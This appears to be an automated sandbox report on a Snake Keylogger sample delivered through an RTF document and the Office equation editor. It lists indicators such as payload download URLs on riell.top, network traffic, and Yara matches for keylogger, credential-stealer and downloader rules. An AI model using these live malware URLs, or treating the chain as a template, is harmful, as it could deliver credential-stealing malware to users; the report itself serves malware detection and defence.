Source: obi23456.scr, 0000000A.00000002.897811172.0000000002489000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000023F6000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024EF000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024B4000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.000000000249E000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.0000000002439000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: obi23456.scr, 00000009.00000002.374798649.0000000003169000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000023F6000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897318708.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: obi23456.scr, 0000000A.00000002.897811172.0000000002439000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: obi23456.scr, 0000000A.00000002.897811172.0000000002489000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024EF000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.00000000024B4000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.000000000249E000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897811172.0000000002439000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.334
Source: EQNEDT32.EXE, 00000008.00000003.373161386.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373241602.00000000005BE000.00000004.00000020.00020000.00000000.sdmp, riell.top.url.0.dr	String found in binary or memory: https://riell.top/
Source: obb.doc.url.0.dr	String found in binary or memory: https://riell.top/obb.doc
Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000008.00000002.373226757.000000000055F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000003.373161386.000000000059F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373241602.000000000059F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://riell.top/obb.scr
Source: EQNEDT32.EXE, 00000008.00000003.373161386.000000000059F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373241602.000000000059F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://riell.top/obb.scrMC:
Source: EQNEDT32.EXE, 00000008.00000002.373226757.000000000055F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://riell.top/obb.scrhhC:
Source: EQNEDT32.EXE, 00000008.00000002.373226757.000000000055F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://riell.top/obb.scri
Source: EQNEDT32.EXE, 00000008.00000002.373226757.000000000055F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://riell.top/obb.scrj
Source: EQNEDT32.EXE, 00000008.00000003.372742491.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000008.00000002.373252120.00000000005D5000.00000004.00000020.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.897421658.000000000069A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 49185 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 49162 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 49164 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown	Network traffic detected: HTTP traffic on port 49183 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown	Network traffic detected: HTTP traffic on port 49181 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49164
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49163
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49185
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49162
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49161
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49183
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49181
Source: unknown	Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49166 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49161 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49179
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49177
Source: unknown	Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49175
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49175 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49177 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49179 -> 443

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49161 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49168 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 9.2.obi23456.scr.31b7b70.6.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 9.2.obi23456.scr.32471f0.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.obi23456.scr.32471f0.7.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.obi23456.scr.32471f0.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.obi23456.scr.32471f0.7.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 9.2.obi23456.scr.3267a20.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.obi23456.scr.3267a20.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.obi23456.scr.3267a20.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.obi23456.scr.3267a20.5.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 9.2.obi23456.scr.780000.2.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 10.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 9.2.obi23456.scr.780000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 9.2.obi23456.scr.21b9714.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 9.2.obi23456.scr.21b6ed4.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 9.2.obi23456.scr.3267a20.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.obi23456.scr.3267a20.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.obi23456.scr.3267a20.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.obi23456.scr.3267a20.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 9.2.obi23456.scr.31b7b70.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.obi23456.scr.31b7b70.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.obi23456.scr.31b7b70.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 9.2.obi23456.scr.31b7b70.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 9.2.obi23456.scr.32471f0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.obi23456.scr.32471f0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.obi23456.scr.32471f0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.obi23456.scr.32471f0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000009.00000002.374594204.0000000000780000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects downloader injector Author: ditekSHen
Source: 0000000A.00000002.897318708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000A.00000002.897318708.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000009.00000002.374798649.0000000003169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000009.00000002.374798649.0000000003169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: obi23456.scr PID: 3376, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: obi23456.scr PID: 3376, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: obi23456.scr PID: 3404, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: obi23456.scr PID: 3404, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\91894CAD.doc, type: DROPPED	Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\obb[1].doc, type: DROPPED	Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen

Microsoft Office drops suspicious files

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\obb.doc.url			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\riell.top.url			Jump to behavior

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\obi23456.scr			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\obb[1].scr			Jump to dropped file

Abnormal high CPU Usage

Source: C:\Users\user\AppData\Roaming\obi23456.scr

Process Stats: CPU usage > 49%

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Memory allocated: 770B0000 page execute and read and write	Jump to behavior

Detected potential crypto function

Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 9_2_0026425F	9_2_0026425F
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_001C5038	10_2_001C5038
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_001C3065	10_2_001C3065
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_001C3891	10_2_001C3891
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_001C78C1	10_2_001C78C1
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_001C2910	10_2_001C2910
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_001C4130	10_2_001C4130
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_001CD1D8	10_2_001CD1D8
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_001C5B18	10_2_001C5B18
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_001C3B72	10_2_001C3B72
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_001C2BF1	10_2_001C2BF1
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_001C844D	10_2_001C844D
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_001C8CB2	10_2_001C8CB2
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_001C35B0	10_2_001C35B0
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_001C3E50	10_2_001C3E50
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_001CC750	10_2_001CC750
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_001C6740	10_2_001C6740
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_001C7000	10_2_001C7000
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_001C6BA0	10_2_001C6BA0
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_001C7460	10_2_001C7460
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_001CC740	10_2_001CC740
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_001CBFC8	10_2_001CBFC8
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_001CBFC5	10_2_001CBFC5
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003FF460	10_2_003FF460
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003FD4E0	10_2_003FD4E0
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003FE178	10_2_003FE178
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003FEE10	10_2_003FEE10
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F5E58	10_2_003F5E58
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003FDB30	10_2_003FDB30
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003FE7C0	10_2_003FE7C0
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F443C	10_2_003F443C
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F1028	10_2_003F1028
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003FC028	10_2_003FC028
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F1018	10_2_003F1018
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F1471	10_2_003F1471
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F9468	10_2_003F9468
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F9459	10_2_003F9459
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F4448	10_2_003F4448
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F6CBC	10_2_003F6CBC
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F48A0	10_2_003F48A0
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F4890	10_2_003F4890
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F1480	10_2_003F1480
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003FC480	10_2_003FC480
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F4CF8	10_2_003F4CF8
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F4CF0	10_2_003F4CF0
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F98E8	10_2_003F98E8
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F18D8	10_2_003F18D8
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003FC8D8	10_2_003FC8D8
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F18C9	10_2_003F18C9
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F6CC8	10_2_003F6CC8
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F1D30	10_2_003F1D30
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F1D20	10_2_003F1D20
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F2178	10_2_003F2178
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F5150	10_2_003F5150
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F9D40	10_2_003F9D40
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F5140	10_2_003F5140
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F55A8	10_2_003F55A8
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003FA198	10_2_003FA198
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F5598	10_2_003F5598
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F2188	10_2_003F2188
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003FA188	10_2_003FA188
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F59F8	10_2_003F59F8
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003FA5F0	10_2_003FA5F0
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003FA5E1	10_2_003FA5E1
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F25E0	10_2_003F25E0
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F25D1	10_2_003F25D1
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F2A38	10_2_003F2A38
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003FAA38	10_2_003FAA38
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F2A28	10_2_003F2A28
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F7A10	10_2_003F7A10
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F5A00	10_2_003F5A00
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003FAA48	10_2_003FAA48
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003FAEA0	10_2_003FAEA0
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F7698	10_2_003F7698
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F2E90	10_2_003F2E90
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003FAE90	10_2_003FAE90
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F2E81	10_2_003F2E81
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F32E8	10_2_003F32E8
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F32D9	10_2_003F32D9
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F3738	10_2_003F3738
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F0320	10_2_003F0320
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003FB320	10_2_003FB320
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003FB311	10_2_003FB311
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F0310	10_2_003F0310
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F8708	10_2_003F8708
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F0778	10_2_003F0778
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003FB778	10_2_003FB778
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F0768	10_2_003F0768
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003FB767	10_2_003FB767
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F3740	10_2_003F3740
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F3B98	10_2_003F3B98
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F3B88	10_2_003F3B88
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F3FF0	10_2_003F3FF0
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F3FED	10_2_003F3FED
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F0BD0	10_2_003F0BD0
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003FBBD0	10_2_003FBBD0
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003F0BC4	10_2_003F0BC4
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_003FBBC1	10_2_003FBBC1
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_00590040	10_2_00590040
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_00590CD8	10_2_00590CD8
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_00590690	10_2_00590690
Source: C:\Users\user\AppData\Roaming\obi23456.scr	Code function: 10_2_00590006	10_2_00590006

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: ~WRF{ACEFE1B1-39FF-4750-A188-3592D29053CF}.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Yara signature match

Source: 9.2.obi23456.scr.31b7b70.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 9.2.obi23456.scr.32471f0.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.obi23456.scr.32471f0.7.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.obi23456.scr.32471f0.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.obi23456.scr.32471f0.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 9.2.obi23456.scr.3267a20.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.obi23456.scr.3267a20.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.obi23456.scr.3267a20.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.obi23456.scr.3267a20.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 9.2.obi23456.scr.780000.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 10.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.obi23456.scr.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 9.2.obi23456.scr.780000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 9.2.obi23456.scr.21b9714.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 9.2.obi23456.scr.21b6ed4.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
